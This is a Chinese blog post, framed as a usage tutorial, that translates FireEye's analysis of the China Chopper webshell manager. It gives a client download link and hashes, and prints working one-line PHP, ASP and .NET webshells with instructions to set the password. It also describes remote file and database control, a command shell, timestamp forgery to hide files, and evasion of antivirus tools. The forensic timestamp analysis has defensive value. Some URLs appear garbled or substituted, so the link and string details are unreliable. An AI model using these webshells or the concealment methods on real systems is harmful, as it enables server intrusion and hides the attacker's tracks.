技术剖析中国菜刀 — 使用教程

2017 年 10 月 3 日2580

这里的中国菜刀不是指切菜做饭的工具,而是中国黑客圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处。中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品。日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程。

Web Shell客户端:

中国菜刀的客户端可在http://www.zjjv.com/下载到,

Web shell (CnC) Client MD5

caidao.exe 5001ef50c7e869253a7c152a638eab8a

客户端使用UPX加壳,有220672个字节大小,如图1所示:

中国菜刀 -- 使用教程

图1,使用WinHex工具查看

使用脱壳工具脱壳,可以看到一些隐藏的细节:

C:\Documents and Settings\Administrator\Desktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011

UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011

File size Ratio Format Name

-------------------- ------ ----------- -----------

700416 <- 220672 31.51% win32/pe decomp.exe

Unpacked 1 file.

使用PEID(一个免费检测软件使用的加壳手法的工具),我们可以看到解压缩后的客户端程序使用Visual C + + 6.0编写,如图2所示:

中国菜刀 -- 使用教程

图2 PEID显示程序所用语言

因为字符串没有进行编码,所以可以通过打印输出该后门如何通信,我们可以看到一个url google.com.hk(图3),

中国菜刀 -- 使用教程

以及参考文本Chopper(图4)

图3 打印字符串refer http://www.zjjv.com/.hk

中国菜刀 -- 使用教程

图4 菜刀的客户端二进制文件参考文档

打开中国菜刀界面,我们可以看到该工具是一款图形界面工具,并且提供了添加自己的目标、管理的功能,在客户端软件上,右键单击选择“添加”,输入IP地址,以及密码和编码方式,如图5所示

中国菜刀 -- 使用教程

图5:中国菜刀客户端界面

服务端payload组件

中国菜刀的工具是一款Webshell管理工具,相应必然有一个服务端的程序,它支持各种语言,如ASP、ASPX、PHP、JSP、CFM,一些官网下载原始程序MD5 HASH如下:

Web shell Payload MD5 Hash

Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08

Customize.cfm ad8288227240477a95fb023551773c84

Customize.jsp acba8115d027529763ea5c7ed6621499

例子如下:

PHP: <?php @eval($_POST['pass']);?>

ASP: <%eval request("pass")%>

.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

在实际使用过程中,替换PASS为链接的时候需要的密码。

功能

上面简单介绍了中国菜刀的客户端和服务端的,下面来介绍下该款工具的其他功能,中国菜刀包含了“安全扫描”功能,攻击者能够使用爬虫或暴力破解来攻击目标站点,如下图:

中国菜刀 -- 使用教程

在除了发现漏洞之外,中国菜刀最强大的莫过于管理功能了,包含以下内容:

1、文件管理(文件资源管理器)

2、数据库管理(DB客户端)

3、虚拟终端(命令行)

在中国菜刀的客户端界面中,右键单击一个目标可以查看相应的功能列表,如图7:

中国菜刀 -- 使用教程

文件管理

中国菜刀作为一个远程访问工具(RAT),包含了常见的上传、下载、编辑、删除、复制、重命名以及改变文件的时间戳。如图8:

中国菜刀 -- 使用教程

修改文件功能现在常见的webshell就带了该功能,图9显示了测试目录的三个文件,因为Windows资源管理器只显示“修改日期”字段,所以通常情况下,能够达到隐藏操作的目的:

中国菜刀 -- 使用教程

使用工具将文件修改和其他两个文件相同,如图10,可以看到文件的修改的日期和其他两个文件一致,如果不是专业的人士,一般不会看出这几个文件的区别:

中国菜刀 -- 使用教程

当文件的创建日期和修改日期被修改之后,查出异常文件非常麻烦,需要分析主文件表MFT以及FTK,fireeye建议使用工具mftdump来进行分析,该工具能够提取文件元数据进行分析。

下表显示了从MFT中提取的Webshell时间戳,注意”fn*”字段包含了文件的原始时间。

Category Pre-touch match Post-touch match

siCreateTime (UTC) 6/6/2013 16:01 2/21/2003 22:48

siAccessTime (UTC) 6/20/2013 1:41 6/25/2013 18:56

siModTime (UTC) 6/7/2013 0:33 2/21/2003 22:48

siMFTModTime (UTC) 6/20/2013 1:54 6/25/2013 18:56

fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01

fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03

fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42

fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04

数据库管理

中国菜刀支持各种数据库,如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等,数据库操作界面,内置了一些常用的数据库语句,能够自动显示表名、列名,查询语句,并且内置了常用的数据库语句。如下图11:

中国菜刀 -- 使用教程

链接之后,菜刀提供了一些常见的数据库语句,如图12:

中国菜刀 -- 使用教程

命令行功能

最后,菜刀提供了一个命令行界面,能够通过命令行shell进行操作系统级别的互动,当然继承的权限是WEB应用的权限。如图13:

中国菜刀 -- 使用教程

Payload属性

除了以上的功能之外,中国菜刀的能够在黑客圈广泛使用,还有以下几个因素:

1、大小

2、服务端内容

3、客户端内容

4、是否免杀

大小

中国菜刀的服务端脚本非常小,是典型的一句话木马,其中aspx服务端软件只有73字节,见图14,相比其他传统的webshell可见它的优越性。

中国菜刀 -- 使用教程

服务端内容

中国菜刀的服务端代码除了简洁之外,并且支持多种加密、编码,下图是aspx的服务端代码,

中国菜刀 -- 使用教程

客户端内容

在浏览器不会产生任何客户端代码,如图16:

中国菜刀 -- 使用教程

杀毒软件检测:

大多数杀毒软件不能检测出该工具。如下图:

中国菜刀 -- 使用教程

中国菜刀 -- 使用教程

fireeye表示将在第二部分内容中详细介绍中国菜刀的通讯机制、交互机制等。

ps:小编翻译完本文流下了感动的泪水,这应该是菜刀自网络出现之后最详细的一篇使用教程了,相信菜刀作者看到本文也会感到欣慰,这么多年了,终于出头了!

标签分类: 菜刀

上一篇:利用MySQL隐形的类型转换绕过WAF检测

下一篇:嗅探(被动嗅探)与ARP欺骗(主动嗅探)详解

0 0